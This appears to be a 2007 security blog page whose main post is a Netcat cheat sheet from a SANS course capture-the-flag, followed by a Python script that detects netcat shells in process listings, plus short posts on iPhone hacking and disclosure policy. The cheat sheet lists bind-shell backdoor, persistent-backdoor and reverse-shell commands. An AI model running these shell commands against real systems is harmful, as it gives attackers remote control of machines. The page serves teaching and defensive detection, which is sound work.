7.31.2007

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber, it ended up being quite a lot of fun, especially for a game that could only last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class, and playing a scenario-based CTF brought it all together, as many of them were used during the game. Mostly we focused on the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife," Netcat proved, as Ed promised us, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that. I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50, in case you were wondering) just to get any other Netcat neophytes started and possibly remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0<backpipe | nc [destination ip] [destination port] 1>backpipe

Traffic Replay:
nc [targetip] [port] < [filename]
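As an added example (not part of the original post), here is a small Python checker that flags the Netcat patterns from this cheat sheet in process-list output: bind shells, reverse shells, plain listeners, and the persistent while-loop wrapper. It parses a constructed `ps -eo pid,ppid,user,args` sample rather than querying a live host, and every PID, user and command in the sample is invented.

```python
import re
import shlex

# Constructed sample of `ps -eo pid,ppid,user,args` output (not captured from a real host).
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
 1432     1 www-data /usr/sbin/apache2 -k start
 2201  1432 www-data sh -c while [ 1 ]; do nc -l -p 4444 -e /bin/sh; done
 2202  2201 www-data nc -l -p 4444 -e /bin/sh
 2310   900 alice    nc 10.0.0.5 8080 -e /bin/bash
 2400   900 alice    nc -l -p 9000
 2500   900 bob      vim notes.txt
"""

NC_NAMES = {"nc", "ncat", "netcat"}
EXEC_FLAGS = {"-e", "-c"}   # flags that make netcat hand the socket to a program
LOOP_RE = re.compile(r"(sh|bash)\s+-c\s+while\b.*\b(nc|ncat|netcat)\b")
PS_RE = re.compile(r"\s*(\d+)\s+(\d+)\s+(\S+)\s+(.*)$")

def classify(args):
    """Describe a netcat command line from the cheat sheet, or return None if it is not netcat."""
    try:
        argv = shlex.split(args)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
        return None
    execs = any(a in EXEC_FLAGS for a in argv)
    listens = "-l" in argv
    if execs and listens:
        return "bind shell (listener spawns a program)"
    if execs:
        return "reverse shell (outbound connection spawns a program)"
    if listens:
        return "plain listener (file transfer or relay endpoint)"
    return "outbound netcat connection"

def scan_ps(text):
    """Return (pid, user, finding) for every netcat-related process in ps output."""
    findings = []
    for line in text.splitlines()[1:]:          # skip the header row
        m = PS_RE.match(line)
        if not m:
            continue
        pid, _ppid, user, args = m.groups()
        if LOOP_RE.match(args):                 # the "persistent backdoor" wrapper
            findings.append((int(pid), user, "persistent loop around netcat"))
            continue
        kind = classify(args)
        if kind:
            findings.append((int(pid), user, kind))
    return findings

if __name__ == "__main__":
    for pid, user, kind in scan_ps(SAMPLE_PS):
        print(f"pid {pid} ({user}): {kind}")
```

On a real host, feed it `subprocess.check_output(["ps", "-eo", "pid,ppid,user,args"], text=True)` instead of the sample; a listener owned by a web-server account is the kind of hit worth chasing first.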

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

7.29.2007

At least we're learning

I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.

I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:

  • I've been in training, busy at work, and abusing Yahoo Pipes, something I'll write more about later.
  • Bacchus has stopped reading anything but Snort alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.
  • ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.
  • No one's really sure what Narc, GPmidi, Norris, or LogicX have been doing, but that's prolly a good thing.
  • Saijak seems to have forgotten how to use a computer, though with good reason.
Regardless, we're all getting stoked for Defcon, and various Minds will be making it out there Thursday and Friday. We'll be in the Riviera and around various places. More about our plans to come.

By the way check out Ed's incident handler challenges, fun stuff.

7.10.2007

Another iPhone Security Perspective

Alright, I promise, last iPhone post, at least from me.

The fine folks over at Symantec's Security Response group are apparently taking a look at the iPhone from a "Wouldn't it be fun to land malicious code on this" perspective and seem to have more confidence than I did initially (see: iPhone sounds a lot like iPwn), and with good reason. It would seem that Apple hasn't been as cavalier with their AJAX/iPhone integration as early reports suggested. For now that seems like good reason, but as the iPhone gets opened up further and further, either by Apple or by intrepid hackers, that may change.

So give the Symantec article a read, and enjoy your iPhone. We'll be coming for it soon...

7.06.2007

iPh0n3: And so it begins...

From TUAW:

"iPhone enthusiasts over at the #iphone-talk and #iphone-mac channels on irc.osx86.hu have developed iPhoneInterface, a new Windows and Mac tool that allows you to manipulate the iPhone's state, launch services, and interact with the iPhone filesystem. With it, you'll be able to scan the iPhone file structure, create and remove folders, start iPhone services, and more."

I don't think anyone is really surprised that this happened. I know many people who believe that Apple actually encourages this type of behavior, evidenced by the ease of cracking into the AppleTV and the numerous enhancements that followed. I don't know if I quite fall into that camp, but I do think it's inevitable that any closed system that gains interest from so many technically inclined people will not stay closed for long. I don't know if that's really a statement about security, or just common sense.

Protection/hackability philosophy aside, I'm excited to see where this goes as I get ready to throw down my own $600 to Apple/AT&T. Take the already impressive iPhone, throw in a healthy helping of the great features you get in regular OS X, add in some of the features found in other high-end phones, and you really have a be-all device. Truth be told, I'd actually be reluctant to use such hacks on my main phone, but my real hope is that this kind of thing encourages Apple to open up the iPhone, add the features people have been asking for, and make it a lil hacking pad that I can also get email and make calls on.

That being said I think SSH and the ability to browse the filesystem are a must, but how about a Python interpreter or something? Flash maybe? A Safari view source option? TextMate for iPhone? Are you listening Apple? I want to be able to play next year's CTF qualifier on the Metro.

7.04.2007

Closure to Disclosure

There's been a fair bit of discussion lately about disclosure policies of various groups and people in information security. This isn't new, or really a surprise, disclosure is something that comes up every few months, every conference, and other random times based on the alignment of Jupiter and Tim's hairstyle. I plan on throwing my opinion on various topics out there, but first I felt it would be most appropriate to make Vulnerable Minds disclosure policy a matter of record. I admit we borrowed heavily from the fine folks at Matasano Chargren, but after our own discussion, modification, and consideration we feel that this document represents the best way of handling vulnerabilities; for us, for vendors, and for the computing community as a whole.